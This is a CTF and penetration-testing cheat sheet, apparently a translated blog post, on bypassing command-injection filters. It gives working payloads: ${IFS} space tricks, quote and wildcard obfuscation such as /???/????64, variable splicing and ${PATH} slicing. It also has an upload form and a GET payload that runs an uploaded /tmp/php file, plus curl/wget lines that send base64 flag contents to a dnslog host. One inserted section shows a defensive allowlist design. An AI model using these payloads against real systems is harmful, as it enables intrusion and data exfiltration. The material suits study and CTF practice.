Table of contents
1. Common alternative commands
2. Space bypass
3. Bypassing regex filters with simple symbols
   1. Single and double quotation marks
   2. The line-continuation character '\'
4. Bypassing regex filters with wildcards
   1. Commands that can be obtained with wildcards
   2. String wildcards
5. Bypassing regex filters with variable splicing
6. Inline execution
7. Slicing environment variables with "${}"
8. Bypassing with [] bracket ranges
9. The source command
10. RCE without echo
   1. Copy to an accessible file
   2. dnslog exfiltration
   3. Reverse shell
Foreword:
The RCE bypass methods in this article were all encountered by the blogger in CTF challenges and real-world penetration tests. There may be omissions or mistakes; I hope you will point them out, thank you!
1. Common alternative commands
more: displays file contents one page at a time
less: similar to more
head: view the first few lines
tac: displays the file starting from the last line; tac is cat in reverse
tail: view the last few lines
nl: displays the file with line numbers
od: reads file contents in binary (octal dump) form
vi: an editor, can also be used to view files
vim: an editor, can also be used to view files
sort: can be used to view files
uniq: can be used to view files
ls: view a directory
dir: view a directory
2. Space bypass
> < <> (redirection operators)
%20 (space)
%09 (tab)
$IFS$9
${IFS} (best to use this one)
$IFS
{cat,flag.txt} (inside braces the comma acts as the separator)
3. Bypassing regex filters with simple symbols
1. Single and double quotation marks
ca''t flag.txt
ca""t flag.txt
Because the single or double quotation marks contain no characters, they add nothing to the word, and the meaning of the command stays the same.
2. The line-continuation character '\'
A backslash at the end of a line means the command continues on the next line: what comes before the line break and what comes after it are read as a single command.
4. Bypassing regex filters with wildcards
Wildcards can stand in for any character.
The shell wildcards are:
- * : matches any characters, zero or more times
- ? : indicates the wildcard character 0 or
1. Commands that can be obtained with wildcards
base64:
/bin/base64 can be written with wildcards as:
/???/????64
Its effect is to output the file in base64-encoded form.
bzip2:
/usr/bin/bzip2 can be written with wildcards as:
/???/???/????2
Its effect is to compress the file into an archive with the .bz2 suffix:
flag.php ==> flag.php.bz2
2. String wildcards
flag.php ==> flag.???
flag*
……
Of course, wildcards can also replace part of a command rather than its full name.
For example:
/bin/ca?
is equivalent to the cat command.
5. Bypassing regex filters with variable splicing
Variables can be defined in the shell statement to split the filtered string into parts and bypass the filter.
Taking flag.php as an example:
x=lag;cat f$x.php
is equivalent to:
cat flag.php
6. Inline execution
Inline execution embeds a subshell statement inside a shell statement; the main shell statement then processes the result of the sub-statement.
The symbols you can use for inline statements are ${} and `` (backticks).
For example:
echo `ls`
echo ${ls}
This is equivalent to printing the result of ls with echo.
Note that `${name}` is shell parameter expansion, so `echo ${ls}` prints the contents of a variable named ls rather than the output of the ls command; the backtick form is the one that actually runs it.
7. Slicing environment variables with "${}"
For the usage of ${}, please see my blog: http://t.csdn.cn/JDFmP
Example:
${PATH:14:1}${PATH:5:1} flag.txt
In this environment it is equivalent to nl flag.txt (the offsets depend on the value of PATH on the target, so they have to be worked out for each environment).
8. Bypassing with [] bracket ranges
For example, [a-c] matches any single character in the range a to c, including a and c themselves.
The range is matched against the current directory.
Example:
/[a-c][h-j][m-o]/[b-d]a[s-u] flag.txt
is equivalent to
/bin/cat flag.txt
Because [] matching only applies to paths under the current directory,
the absolute path to bin must be used.
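Every trick in sections 2 to 8 works against the same weak design: a substring blocklist applied to a string that is then handed to /bin/sh. The following is an added example (not code from the original post) contrasting that fragile check with a hypothetical hardened handler that never invokes a shell; the blocklist, the allowlist of programs and the argument pattern are all constructed for illustration.

```python
import re
import shlex
import subprocess
from typing import List, Optional

# Constructed blocklist modelled on the kind of filter this post defeats:
# it rejects the literal words "cat" and "flag" and the space character.
BLOCKED = ("cat", "flag", " ")

def blocklist_allows(cmd: str) -> bool:
    """Fragile check: substring matching on the raw string passed to /bin/sh."""
    return not any(word in cmd for word in BLOCKED)

# Hardened alternative (hypothetical design): never hand the user's text to a
# shell. Split it into argv, require the program to be one of a few exact names
# and allow only plain filenames (no leading '-' or '.') as arguments.
ALLOWED_PROGRAMS = {"ls", "wc"}
SAFE_ARG = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9._-]*$")

def allowlist_parse(cmd: str) -> Optional[List[str]]:
    """Return argv if every token is acceptable, otherwise None."""
    try:
        argv = shlex.split(cmd)          # resolves ca''t and ca""t to cat
    except ValueError:                   # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        return None                      # /???/????64, x=lag;cat, cat${IFS}...
    if any(not SAFE_ARG.match(arg) for arg in argv[1:]):
        return None                      # ${IFS}, `ls`, f$x.php, flag.???, |, ;
    return argv

def run_allowlisted(cmd: str) -> Optional[str]:
    """Run an accepted command without a shell and return its stdout."""
    argv = allowlist_parse(cmd)
    if argv is None:
        return None
    # shell=False: argv goes straight to execve, so word splitting, globbing,
    # $IFS, ${...} slicing, backticks, ';' and '|' are never interpreted.
    result = subprocess.run(argv, capture_output=True, text=True,
                            stdin=subprocess.DEVNULL, timeout=5)
    return result.stdout
```

The blocklist lets the quoted, ${IFS}-joined and variable-spliced forms through untouched, while the allowlist rejects them because it decides on the parsed argv rather than on substrings of the raw text.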
9. The source command
The source command, also known as the dot command, can be replaced by a dot ( . ).
This command reads and executes the commands contained in a file.
You can build a file upload form, upload a file of commands and have it executed.
The form is:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="http://46230c96-8291-44b8-a58c-c133ec248231.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--The link is the URL of the challenge currently open-->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
The GET request is:
?c=.+/???/????????[@-[]
Generally, on Linux this uploaded file is saved as /tmp/php??????, where the trailing 6 characters are randomly generated and mix upper and lower case (they can be matched with Linux wildcards).
Note: executing an sh script through . does not require the file to have execute permission.
See this article by P神 for reference:
Improvement of non-alphanumeric webshell | Farewell Song
10. RCE without echo
Execution functions without output:
exec()
shell_exec()
`` (backticks)
These need PHP's echo to output their results.
1. Copy to an accessible file
The tee command:
The tee command can create a file or append to one.
Combined with a file-reading command such as cat and the pipe character, it writes the flag into the specified file.
For example:
First copy the root directory listing into a file, then open it in the browser:
ls /| tee ls.txt
Then open url/ls.txt to view the root directory listing.
Next copy the flag file and open it the same way:
cat /flag.php | tee flag.txt
Then open url/flag.txt to view the flag.
Other ways of copying also work:
cp /flag.php flag.txt
mv /flag.php flag.txt
2. dnslog exfiltration
This requires a dnslog platform; you can set one up yourself.
curl <dnslog-platform-url>/`cat flag.php|base64`
wget <dnslog-platform-url>/`cat flag.php|base64`
3. Reverse shell:
I will write this up when I write about privilege escalation.